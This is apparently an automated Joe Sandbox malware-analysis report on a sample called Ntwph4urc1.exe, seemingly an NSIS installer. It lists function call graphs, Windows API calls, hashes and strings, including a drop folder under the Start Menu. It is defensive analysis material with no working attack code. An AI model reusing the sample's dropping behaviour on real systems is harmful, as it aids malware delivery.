                                              • Associated: 00000000.00000002.2691046936.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691353391.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                              • String ID:
                                              • API String ID: 3282139019-0
                                              • Opcode ID: f1a328e51306031731dbcce9d1c3737ebdd7014b04a9a2d8d616989602e21706
                                              • Instruction ID: fd8a01c06953bfbcdc6c7a7ca4fde1a241a6ed83f8ebcdeac2000881ab9a06ac
                                              • Opcode Fuzzy Hash: f1a328e51306031731dbcce9d1c3737ebdd7014b04a9a2d8d616989602e21706
                                              • Instruction Fuzzy Hash: 67C1BFB1604604AFDB206F61ED85D2A3B78EBCA705B10853EF651B11F0CB3D9941DB6E
                                              Function 00403ABD Relevance: 47.5, APIs: 14, Strings: 13, Instructions: 215stringregistryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 295 403abd-403ad5 call 4067e3 298 403ad7-403ae2 GetUserDefaultUILanguage call 406335 295->298 299 403ae9-403b20 call 4062bc 295->299 303 403ae7 298->303 304 403b22-403b33 call 4062bc 299->304 305 403b38-403b3e lstrcatW 299->305 306 403b43-403b6c call 403d93 call 405dcb 303->306 304->305 305->306 312 403b72-403b77 306->312 313 403bfe-403c06 call 405dcb 306->313 312->313 314 403b7d-403ba5 call 4062bc 312->314 319 403c14-403c39 LoadImageW 313->319 320 403c08-403c0f call 40642b 313->320 314->313 324 403ba7-403bab 314->324 322 403cba-403cc2 call 40140b 319->322 323 403c3b-403c6b RegisterClassW 319->323 320->319 337 403cc4-403cc7 322->337 338 403ccc-403cd7 call 403d93 322->338 325 403c71-403cb5 SystemParametersInfoW CreateWindowExW 323->325 326 403d89 323->326 328 403bbd-403bc9 lstrlenW 324->328 329 403bad-403bba call 405cf0 324->329 325->322 331 403d8b-403d92 326->331 332 403bf1-403bf9 call 405cc3 call 4063ee 328->332 333 403bcb-403bd9 lstrcmpiW 328->333 329->328 332->313 333->332 336 403bdb-403be5 GetFileAttributesW 333->336 340 403be7-403be9 336->340 341 403beb-403bec call 405d0f 336->341 337->331 347 403d60-403d61 call 405529 338->347 348 403cdd-403cf7 ShowWindow call 406773 338->348 340->332 340->341 341->332 351 403d66-403d68 347->351 355 403d03-403d15 GetClassInfoW 348->355 356 403cf9-403cfe call 406773 348->356 353 403d82-403d84 call 40140b 351->353 354 403d6a-403d70 351->354 353->326 354->337 359 403d76-403d7d call 40140b 354->359 357 403d17-403d27 GetClassInfoW RegisterClassW 355->357 358 403d2d-403d50 DialogBoxParamW call 40140b 355->358 356->355 357->358 364 403d55-403d5e call 403a0d 358->364 359->337 364->331
                                              APIs
                                                • Part of subcall function 004067E3: GetModuleHandleA.KERNEL32(?,00000020,?,00403514,0000000B), ref: 004067F5
                                                • Part of subcall function 004067E3: GetProcAddress.KERNEL32(00000000,?), ref: 00406810
                                              • GetUserDefaultUILanguage.KERNELBASE(00000002,76233420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Ntwph4urc1.exe",00000000), ref: 00403AD7
                                                • Part of subcall function 00406335: wsprintfW.USER32 ref: 00406342
                                              • lstrcatW.KERNEL32(1033,007A1F48,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F48,00000000,00000002,76233420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Ntwph4urc1.exe",00000000), ref: 00403B3E
                                              • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires,1033,007A1F48,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F48,00000000,00000002,76233420), ref: 00403BBE
                                              • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires,1033,007A1F48,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F48,00000000), ref: 00403BD1
                                              • GetFileAttributesW.KERNEL32(Call), ref: 00403BDC
                                              • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires), ref: 00403C25
                                              • RegisterClassW.USER32(007A7A00), ref: 00403C62
                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403C7A
                                              • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403CAF
                                              • ShowWindow.USER32(00000005,00000000), ref: 00403CE5
                                              • GetClassInfoW.USER32(00000000,RichEdit20W,007A7A00), ref: 00403D11
                                              • GetClassInfoW.USER32(00000000,RichEdit,007A7A00), ref: 00403D1E
                                              • RegisterClassW.USER32(007A7A00), ref: 00403D27
                                              • DialogBoxParamW.USER32(?,00000000,00403E6B,00000000), ref: 00403D46
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2691014747.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2690999891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691032584.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691353391.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
                                              • String ID: "C:\Users\user\Desktop\Ntwph4urc1.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                              • API String ID: 606308-1075850932
                                              • Opcode ID: ed5882197ad2af45622ab53baadaf8c7f939305731a510e2915a0577b65485f7
                                              • Instruction ID: 7ce8ec14a48fa11d69b3a5e1f0875b7083b8d607cd9ed6182ea3b60f82ca9994
                                              • Opcode Fuzzy Hash: ed5882197ad2af45622ab53baadaf8c7f939305731a510e2915a0577b65485f7
                                              • Instruction Fuzzy Hash: 286193702407007ED320AB669D46F2B3A7CEB85B49F40853FF941B22E2DB7D99018B6D
                                              Function 00403015 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 181memoryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 368 403015-403063 GetTickCount GetModuleFileNameW call 405ee4 371 403065-40306a 368->371 372 40306f-40309d call 4063ee call 405d0f call 4063ee GetFileSize 368->372 373 403245-403249 371->373 380 4030a3 372->380 381 403188-403196 call 402fb1 372->381 383 4030a8-4030bf 380->383 387 403198-40319b 381->387 388 4031eb-4031f0 381->388 385 4030c1 383->385 386 4030c3-4030cc call 403444 383->386 385->386 393 4031f2-4031fa call 402fb1 386->393 394 4030d2-4030d9 386->394 391 40319d-4031b5 call 40345a call 403444 387->391 392 4031bf-4031e9 GlobalAlloc call 40345a call 40324c 387->392 388->373 391->388 415 4031b7-4031bd 391->415 392->388 419 4031fc-40320d 392->419 393->388 397 403155-403159 394->397 398 4030db-4030ef call 405e9f 394->398 405 403163-403169 397->405 406 40315b-403162 call 402fb1 397->406 398->405 417 4030f1-4030f8 398->417 410 403178-403180 405->410 411 40316b-403175 call 4068d0 405->411 406->405 410->383 418 403186 410->418 411->410 415->388 415->392 417->405 421 4030fa-403101 417->421 418->381 422 403215-40321a 419->422 423 40320f 419->423 421->405 424 403103-40310a 421->424 425 40321b-403221 422->425 423->422 424->405 426 40310c-403113 424->426 425->425 427 403223-40323e SetFilePointer call 405e9f 425->427 426->405 429 403115-403135 426->429 430 403243 427->430 429->388 431 40313b-40313f 429->431 430->373 432 403141-403145 431->432 433 403147-40314f 431->433 432->418 432->433 433->405 434 403151-403153 433->434 434->405
                                              APIs
                                              • GetTickCount.KERNEL32 ref: 00403026
                                              • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Ntwph4urc1.exe,00000400,?,00000007,00000009,0000000B), ref: 00403042
                                                • Part of subcall function 00405EE4: GetFileAttributesW.KERNELBASE(?,00403055,C:\Users\user\Desktop\Ntwph4urc1.exe,80000000,00000003,?,00000007,00000009,0000000B), ref: 00405EE8
                                                • Part of subcall function 00405EE4: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000007,00000009,0000000B), ref: 00405F0A
                                              • GetFileSize.KERNEL32(00000000,00000000,007B7000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Ntwph4urc1.exe,C:\Users\user\Desktop\Ntwph4urc1.exe,80000000,00000003,?,00000007,00000009,0000000B), ref: 0040308E
                                              • GlobalAlloc.KERNELBASE(00000040,0000000B,?,00000007,00000009,0000000B), ref: 004031C4
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2691014747.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2690999891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691032584.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691353391.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                              • String ID: "C:\Users\user\Desktop\Ntwph4urc1.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Ntwph4urc1.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                              • API String ID: 2803837635-3468640298
                                              • Opcode ID: f652378745d43b93c2f3ffccbc25efe865f8bfd62d9be5f828775b6231d1a4cb
                                              • Instruction ID: b65d07b499067b34cf8ea267e223a71d0fae98adc47698ec1498b1efb03bef53
                                              • Opcode Fuzzy Hash: f652378745d43b93c2f3ffccbc25efe865f8bfd62d9be5f828775b6231d1a4cb
                                              • Instruction Fuzzy Hash: DD51D171900204ABDB119F64DD85B9E7EACEB45316F20843BE911BA2D1DB7C8F418B5D
                                              Function 0040642B Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 209stringCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 720 40642b-406436 721 406438-406447 720->721 722 406449-40645f 720->722 721->722 723 406465-406472 722->723 724 406677-40667d 722->724 723->724 727 406478-40647f 723->727 725 406683-40668e 724->725 726 406484-406491 724->726 729 406690-406694 call 4063ee 725->729 730 406699-40669a 725->730 726->725 728 406497-4064a3 726->728 727->724 731 406664 728->731 732 4064a9-4064e7 728->732 729->730 736 406672-406675 731->736 737 406666-406670 731->737 734 406607-40660b 732->734 735 4064ed-4064f8 732->735 740 40660d-406613 734->740 741 40663e-406642 734->741 738 406511 735->738 739 4064fa-4064ff 735->739 736->724 737->724 747 406518-40651f 738->747 739->738 744 406501-406504 739->744 745 406623-40662f call 4063ee 740->745 746 406615-406621 call 406335 740->746 742 406651-406662 lstrlenW 741->742 743 406644-40664c call 40642b 741->743 742->724 743->742 744->738 749 406506-406509 744->749 758 406634-40663a 745->758 746->758 751 406521-406523 747->751 752 406524-406526 747->752 749->738 754 40650b-40650f 749->754 751->752 756 406561-406564 752->756 757 406528-40654f call 4062bc 752->757 754->747 759 406574-406577 756->759 760 406566-406572 GetSystemDirectoryW 756->760 771 406555-40655c call 40642b 757->771 772 4065ef-4065f2 757->772 758->742 762 40663c 758->762 764 4065e2-4065e4 759->764 765 406579-406587 GetWindowsDirectoryW 759->765 763 4065e6-4065ea 760->763 767 4065ff-406605 call 40669d 762->767 763->767 768 4065ec 763->768 764->763 770 406589-406593 764->770 765->764 767->742 768->772 776 406595-406598 770->776 777 4065ad-4065c3 SHGetSpecialFolderLocation 770->777 771->763 772->767 774 4065f4-4065fa lstrcatW 772->774 774->767 776->777 779 40659a-4065a1 776->779 780 4065c5-4065dc SHGetPathFromIDListW CoTaskMemFree 777->780 781 4065de 777->781 782 4065a9-4065ab 779->782 780->763 780->781 781->764 782->763 782->777
                                              APIs
                                              • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 0040656C
                                              • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,007A0F28,?,0040548D,007A0F28,00000000), ref: 0040657F
                                              • SHGetSpecialFolderLocation.SHELL32(0040548D,0079A700,00000000,007A0F28,?,0040548D,007A0F28,00000000), ref: 004065BB
                                              • SHGetPathFromIDListW.SHELL32(0079A700,Call), ref: 004065C9
                                              • CoTaskMemFree.OLE32(0079A700), ref: 004065D4
                                              • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 004065FA
                                              • lstrlenW.KERNEL32(Call,00000000,007A0F28,?,0040548D,007A0F28,00000000), ref: 00406652
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2691014747.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2690999891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691032584.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691353391.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                              • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                              • API String ID: 717251189-1230650788
                                              • Opcode ID: aaa997f56c542f4584990acf2269000a5d9ad94e2d12eeb77129bcfb95bdb2f4
                                              • Instruction ID: 6a9894c1754425a34e634a53c322024ca71031740d406166b65bc8419ebad360
                                              • Opcode Fuzzy Hash: aaa997f56c542f4584990acf2269000a5d9ad94e2d12eeb77129bcfb95bdb2f4
                                              • Instruction Fuzzy Hash: A261F471600505ABDF249F24DD40ABE37A5AF51318F22813FE543BA2D4DB3D8AA1CB5E
                                              Function 0040176F Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145stringtimeCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 783 40176f-401794 call 402d3e call 405d3a 788 401796-40179c call 4063ee 783->788 789 40179e-4017b0 call 4063ee call 405cc3 lstrcatW 783->789 794 4017b5-4017b6 call 40669d 788->794 789->794 798 4017bb-4017bf 794->798 799 4017c1-4017cb call 40674c 798->799 800 4017f2-4017f5 798->800 808 4017dd-4017ef 799->808 809 4017cd-4017db CompareFileTime 799->809 801 4017f7-4017f8 call 405ebf 800->801 802 4017fd-401819 call 405ee4 800->802 801->802 810 40181b-40181e 802->810 811 40188d-4018b6 call 405456 call 40324c 802->811 808->800 809->808 812 401820-40185e call 4063ee * 2 call 40642b call 4063ee call 405a54 810->812 813 40186f-401879 call 405456 810->813 825 4018b8-4018bc 811->825 826 4018be-4018ca SetFileTime 811->826 812->798 845 401864-401865 812->845 823 401882-401888 813->823 828 402bcb 823->828 825->826 827 4018d0-4018db CloseHandle 825->827 826->827 830 4018e1-4018e4 827->830 831 402bc2-402bc5 827->831 833 402bcd-402bd1 828->833 834 4018e6-4018f7 call 40642b lstrcatW 830->834 835 4018f9-4018fc call 40642b 830->835 831->828 842 401901-402390 834->842 835->842 846 402395-40239a 842->846 847 402390 call 405a54 842->847 845->823 848 401867-401868 845->848 846->833 847->846 848->813
                                              APIs
                                              • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires,?,?,00000031), ref: 004017B0
                                              • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires,?,?,00000031), ref: 004017D5
                                                • Part of subcall function 004063EE: lstrcpynW.KERNEL32(?,?,00000400,00403573,007A7A60,NSIS Error,?,00000007,00000009,0000000B), ref: 004063FB
                                                • Part of subcall function 00405456: lstrlenW.KERNEL32(007A0F28,00000000,0079A700,762323A0,?,?,?,?,?,?,?,?,?,0040338D,00000000,?), ref: 0040548E
                                                • Part of subcall function 00405456: lstrlenW.KERNEL32(0040338D,007A0F28,00000000,0079A700,762323A0,?,?,?,?,?,?,?,?,?,0040338D,00000000), ref: 0040549E
                                                • Part of subcall function 00405456: lstrcatW.KERNEL32(007A0F28,0040338D,0040338D,007A0F28,00000000,0079A700,762323A0), ref: 004054B1
                                                • Part of subcall function 00405456: SetWindowTextW.USER32(007A0F28,007A0F28), ref: 004054C3
                                                • Part of subcall function 00405456: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E9
                                                • Part of subcall function 00405456: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405503
                                                • Part of subcall function 00405456: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405511
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2691014747.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2690999891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691032584.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691353391.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                              • String ID: C:\Users\user\AppData\Local\Temp\nsn6F2A.tmp$C:\Users\user\AppData\Local\Temp\nsn6F2A.tmp\System.dll$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires$Call
                                              • API String ID: 1941528284-3763001936
                                              • Opcode ID: 1581b04633949f1bdc692b7a2870eaf759d87e9c25fdc22cdc9577452c9ab1ce
                                              • Instruction ID: cd03b910d30ecf031e582351f340fed2e2266b195dd1fdcb6122cfe31266ec79
                                              • Opcode Fuzzy Hash: 1581b04633949f1bdc692b7a2870eaf759d87e9c25fdc22cdc9577452c9ab1ce
                                              • Instruction Fuzzy Hash: 0B418571510508BACF11BFB5CD85DAE3A79EF45329B20423FF422B11E1DB3C8A519A6E
                                              Function 00405456 Relevance: 10.6, APIs: 7, Instructions: 72stringwindowCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 849 405456-40546b 850 405471-405482 849->850 851 405522-405526 849->851 852 405484-405488 call 40642b 850->852 853 40548d-405499 lstrlenW 850->853 852->853 855 4054b6-4054ba 853->855 856 40549b-4054ab lstrlenW 853->856 858 4054c9-4054cd 855->858 859 4054bc-4054c3 SetWindowTextW 855->859 856->851 857 4054ad-4054b1 lstrcatW 856->857 857->855 860 405513-405515 858->860 861 4054cf-405511 SendMessageW * 3 858->861 859->858 860->851 862 405517-40551a 860->862 861->860 862->851
                                              APIs
                                              • lstrlenW.KERNEL32(007A0F28,00000000,0079A700,762323A0,?,?,?,?,?,?,?,?,?,0040338D,00000000,?), ref: 0040548E
                                              • lstrlenW.KERNEL32(0040338D,007A0F28,00000000,0079A700,762323A0,?,?,?,?,?,?,?,?,?,0040338D,00000000), ref: 0040549E
                                              • lstrcatW.KERNEL32(007A0F28,0040338D,0040338D,007A0F28,00000000,0079A700,762323A0), ref: 004054B1
                                              • SetWindowTextW.USER32(007A0F28,007A0F28), ref: 004054C3
                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E9
                                              • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405503
                                              • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405511
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2691014747.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2690999891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691032584.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691046936.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2691353391.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                              • String ID:
                                              • API String ID: 2531174081-0
                                              • Opcode ID: 0decb5d3bd7311ee25dcb4cac47719bdc9880b480b93dcede20cbb014160680e
                                              • Instruction ID: 198c43ce2186877ab3aec1728abe16fb3d15ea5683a6b9ae92d40c5f72e5eea1
                                              • Opcode Fuzzy Hash: 0decb5d3bd7311ee25dcb4cac47719bdc9880b480b93dcede20cbb014160680e
                                              • Instruction Fuzzy Hash: EC21AF75900518BACB119F65DD44ACFBFB9EF89354F10802AF904B22A1C3798A81CFA8
                                              Function 00405925 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39COMMON
                                              Download Yara Rule

                                              Control-flow Graph

